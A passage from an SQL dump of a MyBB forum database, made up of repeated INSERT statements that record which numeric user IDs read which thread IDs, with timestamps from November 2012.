'9', '1352350104'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('861', '9', '1352350203'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('765', '7', '1352350337'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('765', '257', '1352353838'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1222', '257', '1352353957'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1078', '67', '1352363395'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1222', '67', '1352363435'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1223', '67', '1352486400'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1224', '67', '1352363374'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1213', '67', '1352367329'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1099', '329', '1352371159'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1047', '329', '1352371187'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('723', '329', '1352371239'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1203', '228', '1352371920'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('248', '329', '1352371944'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('878', '329', '1352372051'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('418', '329', '1352372065'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1205', '329', '1352372104'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1081', '329', '1352372131'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('262', '329', '1352372172'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1204', '228', '1352372372'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1204', '222', '1352373011'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1208', '330', '1352373384'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1208', '100', '1352375428'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1203', '100', '1352375391'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1041', '100', '1352375483'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('966', '100', '1352375618'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('203', '329', '1352377695'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1012', '329', '1352377741'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('765', '61', '1352379351'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1047', '62', '1352383988'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1222', '53', '1352387060'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1211', '53', '1352536521'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1222', '1', '1352391879'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('14', '1', '1352393480'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1225', '5', '1352393641'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1226', '5', '1352393844'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1215', '150', '1352394343'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1211', '62', '1352397060'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1215', '53', '1352399016'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('765', '53', '1352399053'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1225', '82', '1352550686'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1207', '2', '1352770599'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1213', '2', '1352408253'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('997', '331', '1352408752'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('173', '331', '1352408757'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('991', '331', '1352408759'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('814', '331', '1352409494'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('647', '331', '1352409541'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1160', '332', '1352412723'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1059', '332', '1352412757'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1185', '332', '1352412793'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('508', '332', '1352412801'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('310', '332', '1352412819'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('987', '332', '1352412855'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('765', '332', '1352412910'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('117', '332', '1352412962'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('521', '332', '1352412975'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('127', '332', '1352412994'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('764', '332', '1352413036'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1227', '333', '1352478373'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1207', '333', '1352413676'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1078', '333', '1352413610'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1228', '333', '1352624759'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('27', '67', '1352414306'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('20', '67', '1352414443'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1146', '332', '1352414845'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('951', '332', '1352440747'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('712', '67', '1352415084'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1228', '82', '1352495685'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1227', '82', '1352464380'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1228', '62', '1352550958'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1227', '61', '1352484165'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1228', '1', '1352492787'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1227', '1', '1352519539'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1225', '1', '1352427269'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1226', '1', '1352520745'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('747', '1', '1352428115'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('50', '1', '1352428985'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1115', '333', '1352431147'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('119', '333', '1352431188'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1229', '333', '1352624757'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('861', '333', '1352431369'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1229', '1', '1352534124'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1145', '333', '1352431732'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1204', '333', '1352431804'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1229', '334', '1352431858'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1227', '334', '1352431873'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1227', '2', '1352433237'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1226', '54', '1352436364'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('359', '54', '1352815154'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1191', '54', '1352437662'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1140', '332', '1352440850'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1220', '332', '1352440959'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('860', '332', '1352441115'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('96', '54', '1352442870'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('313', '332', '1352443157'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('216', '332', '1352443171'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1102', '332', '1352443254'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1223', '332', '1352443287'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('690', '332', '1352443309'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1211', '332', '1352443437'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1203', '332', '1352443512'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('990', '332', '1352443622'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('836', '54', '1352443834'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1225', '67', '1352445821'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1229', '228', '1352449424'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1227', '228', '1352449595'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1078', '335', '1352449573'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1203', '335', '1352449597'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1228', '228', '1352449702'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1226', '228', '1352449726'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1224', '228', '1352449926'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1228', '257', '1352450456'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1227', '257', '1352450849'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1226', '257', '1352451319'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1226', '62', '1352451205'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1230', '257', '1352619609'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1231', '335', '1352452341'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('719', '62', '1352455008'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('135', '62', '1352455017'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1229', '82', '1352550663'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1230', '82', '1352519281'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1231', '82', '1352500126'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1190', '336', '1352469116'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('6', '336', '1352469175'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('303', '336', '1352469309'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1149', '336', '1352469285'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1230', '228', '1352470024'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('461', '62', '1352470115'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1032', '336', '1352470612'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1231', '258', '1352526317'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('673', '54', '1352472109'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('457', '54', '1352819337'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1230', '53', '1352479134'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('861', '53', '1352474248'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1226', '53', '1352474302'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1097', '323', '1352474973'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1098', '323', '1352474981'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('967', '323', '1352475097'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1223', '53', '1352475708'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('40', '323', '1352476787'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('39', '323', '1352476794'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1218', '323', '1352476996'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1230', '61', '1352490126'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1220', '61', '1352479144'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1203', '61', '1352479155'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1232', '53', '1352561683'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1232', '67', '1352486209'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('861', '67', '1352486180'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1228', '67', '1352486497'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('157', '61', '1352488913'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1215', '222', '1352489710'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1232', '61', '1352566379'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1233', '61', '1352521958'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1233', '53', '1352491300'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1217', '61', '1352491874'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1232', '1', '1352496647'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1230', '1', '1352678725'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1232', '82', '1352560688'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1231', '1', '1352496640'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1231', '61', '1352497096'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('532', '199', '1352501430'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('745', '338', '1352504168'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1183', '4', '1352517050'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('765', '4', '1352517072'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1234', '4', '1352519874'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('398', '4', '1352518368'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('398', '100', '1352517538'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1210', '100', '1352517383'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1232', '4', '1352518299'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('398', '82', '1352519301'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1185', '311', '1352518006'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('137', '311', '1352518025'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('500', '311', '1352518045'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('507', '311', '1352518046'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('466', '311', '1352518047'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('95', '311', '1352518051'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('156', '311', '1352518056'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('82', '311', '1352518059'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('20', '311', '1352518062'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1228', '4', '1352518444'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1230', '4', '1352518567'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1229', '4', '1352518667'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('20', '4', '1352518753'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1201', '4', '1352519425'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1234', '1', '1352610871'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1229', '205', '1352521504'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1234', '5', '1352520923'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1235', '5', '1352522179'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('19', '5', '1352521492'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('766', '5', '1352521610'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1236', '205', '1352633600'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1235', '205', '1352521947'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1237', '5', '1352521857'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1236', '5', '1352521969'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1215', '5', '1352522083'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1169', '5', '1352523105'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1238', '5', '1352523437'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1239', '5', '1352524747'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1240', '1', '1352524893'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1241', '1', '1352767251'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1239', '1', '1352525366'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1213', '8', '1352525480'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1242', '9', '1352525739'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1040', '9', '1352525940'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('812', '9', '1352526033'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1239', '258', '1352526524'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1232', '258', '1352552067'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1220', '258', '1352526737'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1233', '258', '1352526579'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1211', '9', '1352526830'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1211', '1', '1352526851'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1243', '8', '1352527015'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('587', '4', '1352527100'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('587', '8', '1352527110'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1050', '4', '1352527203'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1225', '8', '1352527905'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1050', '1', '1352607677'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1244', '5', '1352528647'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('405', '5', '1352528837'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('426', '1', '1352571057'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1245', '1', '1352596626'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1171', '1', '1352603898'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1171', '4', '1352597632'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('426', '5', '1352530414'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('96', '5', '1352530425'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1167', '5', '1352530472'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1032', '5', '1352530491'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('800', '5', '1352530932'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1189', '5', '1352530951'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1199', '5', '1352531012'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1209', '1', '1352534038'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1244', '53', '1352534397'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1236', '53', '1352662341'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1169', '53', '1352624822'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1246', '1', '1352570881'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1169', '7', '1352536053'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('212', '1', '1352536256'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('431', '1', '1352536266'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('439', '1', '1352536349'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1148', '53', '1352536435'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1239', '53', '1352536447'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('398', '53', '1352626526'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1246', '53', '1352561649'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1232', '257', '1352558036'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('487', '53', '1352537002'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1235', '53', '1352625408'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1229', '257', '1352537928'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('20', '1', '1352611309'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1227', '4', '1352542082'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1220', '4', '1352542136'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('465', '4', '1352571859'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('238', '258', '1352547037'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1235', '258', '1352547068'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1246', '257', '1352594980'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('465', '257', '1352547870'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1245', '257', '1352550689'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('238', '228', '1352558312'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1245', '62', '1352550221'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1235', '228', '1352550242'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1246', '228', '1352558327'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1040', '62', '1352796087'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1232', '228', '1352550378'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1242', '228', '1352550456'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1245', '228', '1352580102'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1237', '82', '1352597444'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1236', '82', '1352662182'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1213', '82', '1352762780'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('812', '82', '1352550682'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('426', '82', '1352551193'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1171', '82', '1352598257'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1209', '82', '1352550707'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1246', '82', '1352551575'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1245', '82', '1352550779'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1242', '82', '1352551639'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1239', '228', '1352550736'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('812', '228', '1352550750'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('792', '82', '1352589176'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('315', '82', '1352589181'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('812', '62', '1352550902'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1234', '62', '1352551007'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1242', '257', '1352553521'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('766', '53', '1352553576'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('98', '53', '1352554499'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) 